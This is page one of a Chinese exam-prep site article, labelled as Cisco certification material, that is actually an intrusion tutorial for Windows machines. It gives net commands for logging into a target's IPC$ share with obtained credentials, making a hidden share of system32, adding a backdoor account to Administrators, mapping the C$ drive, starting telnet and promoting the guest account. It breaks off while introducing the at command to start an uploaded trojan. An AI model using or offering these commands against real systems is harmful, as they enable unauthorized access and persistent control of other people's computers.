思科认证:入侵命令详解

思科认证:入侵命令详解

考试吧：http://www.exam8.com    来源：思科网络技术论坛    点击数： <script language="javascript" src="/computer/GetHits.asp?ArticleID=14523" type="text/javascript"></script> 6352    更新时间：2005-6-7 8:19:00

<script type="text/javascript"> var arrBaiduCproConfig=new Array(); arrBaiduCproConfig['uid'] =65193; arrBaiduCproConfig['n'] ='exam8cpr'; arrBaiduCproConfig['tm'] =23; arrBaiduCproConfig['cm'] =25; arrBaiduCproConfig['um'] =26; arrBaiduCproConfig['w'] =729; arrBaiduCproConfig['h'] =45; arrBaiduCproConfig['wn'] =4; arrBaiduCproConfig['hn'] =1; arrBaiduCproConfig['ta'] ='right'; arrBaiduCproConfig['tl'] ='bottom'; arrBaiduCproConfig['bu'] =0; arrBaiduCproConfig['bd'] ='#ffffff'; arrBaiduCproConfig['bg'] ='#ffffff'; arrBaiduCproConfig['tt'] ='#0000ff'; arrBaiduCproConfig['ct'] ='#333333'; arrBaiduCproConfig['url'] ='#666666'; arrBaiduCproConfig['bdl'] ='#ffffff'; arrBaiduCproConfig['rad'] =1; </script> <script src="http://cpro.baidu.com/cpro/ui/ui.js" type="text/javascript"> </script> <script type="text/javascript"> </script> baidu marginwidth="0" marginheight="0" src="http://cpro.baidu.com/cpro/ui/uijs.php?cn=1&uid=65193&n=exam8cpr&tm=23&cm=25&um=26&rsi0=729&rsi1=45&wn=4&hn=1&rssl0=right&rssl1=bottom&rsi2=0&rss0=%23ffffff&rss1=%23ffffff&rss2=%230000ff&rss3=%23333333&rss4=%23666666&rss5=%23ffffff&rad=1&word=http%3A%2F%2Fwww.exam8.com%2Fcomputer%2FCisco%2Fjiaocheng%2F200506%2F14523.html&fv=8&refer=http%3A%2F%2Fwww.exam8.com%2Fcomputer%2FCisco%2Fjiaocheng%2F200506%2F14523_2.html" frameborder="0" width="729" scrolling="no" height="45" allowtransparency="allowtransparency">

<script language="javascript" src="/Exam8_AD/200511/3.js" type="text/javascript"></script>

--------------------------------------------------------------------------------     1：NET     只要你拥有某IP的用户名和密码，那就用IPC$做连接吧！     这里我们假如你得到的用户是hbx，密码是123456。假设对方IP为127.0.0.1     net use //127.0.0.1/ipc$ 123456 /user:hbx null密码为空     退出的命令是     net use //127.0.0.1/ipc$ /delete     --------------------------------     net share是查看主机共享资源我们用它建一个秘密共享目录吧net share me=c:/winnt/system32 这样这个机器就有了一个名为me的共享目录，而打开它就是winnt下的system32目录，如果你用win2000的系统就知这个目录有多重要了，如果不想要也好办net share me /delete 呵呵，没有了，是不是很方便的啊。     ---------------------- ---------------------- ----------------------     下面的操作你必须登陆后才可以用.登陆的方法就在上面.     ---------------------- ---------------------- ----------------------     下面我们讲怎么创建一个用户，由于SA的权限相当于系统的超级用户.     我们加一个heibai的用户密码为lovechina     net user heibai lovechina /add     只要显示命令成功，那么我们可以把他加入Administrator组了.     net localgroup Administrators heibai /add     ----------------------     这里是讲映射对方的C盘，当然其他盘也可以，只要存在就行了.我们这里把对方的C盘映射到本地的Z盘.     net use z://127.0.0.1/c$     ----------------------     net start telnet     这样可以打开对方的TELNET服务.     ----------------------     这里是将Guest用户激活，guest是NT的默认用户，而且无法删除呢？不知道是否这样，我的2000就是删除不了它。     net user guest /active:yes     ----------------------     net user guest /active:no这样这个guest的用户就又被禁用了     ----------------------     这里是把一个用户的密码改掉，我们把guest的密码改为lovechina，其他用户也可以的。只要有权限就行了呀！     net user guest lovechina     有人问到提高权限的问题 下面就解决下     net localgroup administrators guest /add     将guest变为administrator         net命令果然强大啊！ net view命令看对方开了共享     -------------------------------------------------------------------------------------------------------------     net user是查看所有用户列表，看看哪个用户是和你一样偷跑进来的，给他名给删掉，让他美，     net user 用户名 /delete哈哈,他没有了,管他什么是不是管理员呢,不过我们还是查一下管理员组有什么用户吧,这样的用户才对我们有用嘛 net localgroup administrators就列出管理员组成员了,再查看一下administrator这个用户，因为这个是创建系统时建出来的，所以要看看他的系统是什么时间创建出来的     net user administrator，然后再查看别的管理员用户是什么时间创建的，如果相差太远，那可能是被别人偷偷跑来偷建的，一律del，安全第一哦................     ---------------------------------------------------------------------------------------------------------------------------         2:at     一般一个入侵者入侵后都会留下后门，也就是种木马了，你把木马传了上去，怎么启动他呢？     那么需要用AT命令，这里假设你已经登陆了那个服务器。   [1] [2] [3] [4] [5] 下一页